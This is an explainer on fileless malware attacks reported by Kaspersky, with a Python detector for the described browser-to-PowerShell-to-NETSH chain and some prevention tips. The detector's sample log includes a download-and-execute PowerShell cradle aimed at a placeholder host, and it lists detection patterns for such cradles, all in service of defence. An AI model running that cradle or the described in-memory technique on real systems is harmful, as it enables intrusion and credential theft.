A new kind of malware, identified by malware researchers, has infected 140 organizations around the world. Called fileless malware, it injects itself into memory and leaves no sign of intrusion, which makes it difficult to detect. Russia-based Kaspersky Lab has published a report stating that fileless malware has struck banks, governments and telecom companies in 40 countries, but the report did not give the attackers a name.
Fileless malware is a "non-malware" attack in which an attacker uses existing software, approved applications and authorized protocols to carry out malicious activity. Such attacks can take control of a system without downloading any malicious file. It is a variant of malicious software that lives only in the computer's memory (RAM) and does not write to any part of the computer's file system, unlike conventional malware, which is installed on the hard drive where security scans can find it. The attackers employed widely used system administration and security tools, including PowerShell, Metasploit and Mimikatz, to inject their malicious code into computer memory.
They hosted their operation on poorly controlled country-code top-level domains, those of Gabon, the Central African Republic and Mali. The researchers state: “The trick of using some domains is that they are free and missing Whois information after domain expiration.”
“Given that the attackers used the Metasploit Framework, standard Windows utilities and unknown domains with no Whois information, this makes attribution almost impossible,” they conclude. The researchers add that the groups with the most similar tactics, techniques and procedures are the banking-fraud crime groups GCMAN and Carbanak.
Highlights of Fileless Malware Attacks:-
- The user visits a website using the Firefox browser.
- The website loads Flash.
- Flash invokes PowerShell, an operating-system tool that is part of every Windows computer, and sends it instructions through commands that reside only in memory.
- PowerShell connects to the C&C (Command and Control) server and downloads a malicious PowerShell script. The script's code hides in memory and steals passwords and other sensitive data, including system administrators' credentials, and sends this information to the attacker. At no point is anything written to the infected machine's disk.
After that, the attackers obtain passwords using standard utilities such as Microsoft's command-line scripting utility NETSH, which sends the compromised passwords from the victim's computer to the attacker's C&C server. At this point the attackers have full access to the computer. Because the malware resides only in memory, all traces of the attack disappear whenever the victim reboots the system, which makes it very difficult to detect and investigate fileless malware and to determine where the attack originated.
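As an added example, not code from the article or from Kaspersky's report, the following Python detector shows what the chain described above (browser loads Flash, Flash starts PowerShell, PowerShell pulls a script into memory, NETSH is launched from PowerShell) looks like in process-creation telemetry and how a defender can flag it. The log lines, the field format and the plugin-host process names are constructed assumptions for this example; on a real estate the same fields come from Windows Security Event ID 4688 or Sysmon Event ID 1, and the parent/child and command-line checks carry over unchanged.

```python
"""Toy detector for the in-memory PowerShell chain described in the article.

Input is a list of constructed process-creation records in a simplified
key="value" format (assumption for this example; real records come from
Event ID 4688 / Sysmon Event ID 1). Output is a list of (pid, reason) alerts.
"""
import ntpath
import re
from dataclasses import dataclass

# Parents that should essentially never spawn PowerShell on a workstation.
# The page names Firefox and Flash; the plugin-host process names are an
# assumption for this example.
SUSPICIOUS_PARENTS = {"firefox.exe", "plugin-container.exe", "flashplayerplugin.exe"}

# Command-line fragments typical of memory-only download-and-execute use.
CRADLE_INDICATORS = [
    ("DownloadString", re.compile(r"downloadstring", re.I)),
    ("Invoke-Expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("EncodedCommand", re.compile(r"-enc(odedcommand)?\b", re.I)),
    ("Hidden window", re.compile(r"-windowstyle\s+hidden", re.I)),
]

# Constructed sample telemetry (not from any real incident). pid 4200 is the
# Flash/Firefox -> PowerShell hop; pid 4300 is NETSH under PowerShell; pid 4400
# is ordinary admin use of PowerShell from the desktop shell and must not alert.
SAMPLE_LOG = [
    'pid="4100" ppid="3000" image="C:\\Program Files\\Mozilla Firefox\\firefox.exe" parent="explorer.exe" cmdline="firefox.exe"',
    'pid="4200" ppid="4100" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" parent="firefox.exe" '
    'cmdline="powershell.exe -NoProfile -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"',
    'pid="4300" ppid="4200" image="C:\\Windows\\System32\\netsh.exe" parent="powershell.exe" cmdline="netsh interface show interface"',
    'pid="4400" ppid="3000" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" parent="explorer.exe" cmdline="powershell.exe Get-ChildItem C:\\Users"',
]


@dataclass
class Event:
    pid: int
    ppid: int
    image: str          # basename of the started executable, lower-cased
    parent_image: str   # basename of the parent executable, lower-cased
    cmdline: str


def parse_event(line):
    """Parse one key="value" record into an Event (values contain no double quotes)."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return Event(
        pid=int(fields["pid"]),
        ppid=int(fields["ppid"]),
        image=ntpath.basename(fields["image"]).lower(),
        parent_image=fields["parent"].lower(),
        cmdline=fields["cmdline"],
    )


def analyse(lines):
    """Return (pid, reason) alerts for the three stages of the described chain."""
    events = [parse_event(line) for line in lines]
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if e.image == "powershell.exe":
            # Stage 1: PowerShell started by a browser or browser plugin host.
            if e.parent_image in SUSPICIOUS_PARENTS:
                alerts.append((e.pid, f"powershell spawned by {e.parent_image}"))
            # Stage 2: in-memory download-and-execute cradle on the command line.
            hits = [name for name, rx in CRADLE_INDICATORS if rx.search(e.cmdline)]
            if hits:
                alerts.append((e.pid, "download cradle indicators: " + ", ".join(hits)))
        elif e.image == "netsh.exe":
            # Stage 3: NETSH launched by a PowerShell process seen earlier.
            parent = by_pid.get(e.ppid)
            if parent is not None and parent.image == "powershell.exe":
                alerts.append((e.pid, "netsh launched from powershell"))
    return alerts


if __name__ == "__main__":
    for pid, reason in analyse(SAMPLE_LOG):
        print(f"ALERT pid={pid}: {reason}")
```

The parent-process check is the most robust of the three: command-line indicators can be obfuscated, but a browser or plugin host starting powershell.exe is rare on a managed workstation regardless of what the command line says. Script block logging (Event ID 4104) is the natural complement, because it records the decoded script content after it is loaded into memory, which a reboot would otherwise erase.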
Prevention Tips For Fileless Malware Detection:-
Gartner security analyst Avivah Litan says that fileless malware attacks are becoming more common and evade most endpoint protection and detection tools. Litan advises organizations to take the following steps to prevent fileless malware attacks.
- Patch systems often to close common vulnerabilities.
- Limit the use of system administration tools such as Microsoft PowerShell; grant access to them only on the basis of reasonable need.
- Invest in reputable companies' products that add protection against memory attacks.
- Use application control on endpoint computers to ensure that only the organization's approved applications can run.
IT professionals and cyber security firms therefore strongly recommend not inviting such vulnerable applications onto your system, and removing fileless malware promptly and safely to prevent future attacks.